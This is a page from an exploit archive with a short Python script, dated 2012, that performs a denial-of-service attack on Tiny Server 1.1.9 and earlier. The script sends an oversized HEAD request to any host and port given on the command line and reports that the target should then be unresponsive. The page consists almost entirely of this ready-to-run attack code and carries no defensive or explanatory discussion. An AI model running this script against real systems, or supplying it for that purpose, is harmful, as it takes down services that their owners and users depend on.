Home / exploitsPDF  

Tiny Server 1.1.9 Denial Of Service

Posted on 21 March 2012

#!/usr/bin/python ############################################################################### # Overflow exploiting a vulnerability in Tiny Server <=1.1.9 (HTTP) HEAD request. # Date of Discovery: 3/19/2012 (0 Day) # Author: Brock Haun # Vulnerable Software Download: http://tinyserver.sourceforge.net/tinyserver_full.zip # Software Version: <=1.1.9 # Target OS: Windows (Tested on Windows 7) ############################################################################### import httplib,sys if (len(sys.argv) != 3): print ' [*]Usage: ./' + sys.argv[0] + ' <target host> <port>' sys.exit() host = sys.argv[1] port = sys.argv[2] buffer = 'A' * 100 + 'HTTP/1.0 ' print ' [*]*************************************************' print '[*] Tiny Server <= 1.1.0(HTTP) HEAD request overflow' print '[*] Written by Brock Haun' print '[*] security.brockhaun@gmail.com' print '[*]************************************************* ' try: print ' [*] Attempting connection.' httpServ = httplib.HTTPConnection(host , port) httpServ.connect() print ' [*] Connected.' print ' [*] Sending crash buffer.' httpServ.request('HEAD' , buffer) print ' [*] Done! Target should be unresponsive!' except: print ' [***] Connection error. Something went wrong. :(' httpServ.close() sys.exit()

 

TOP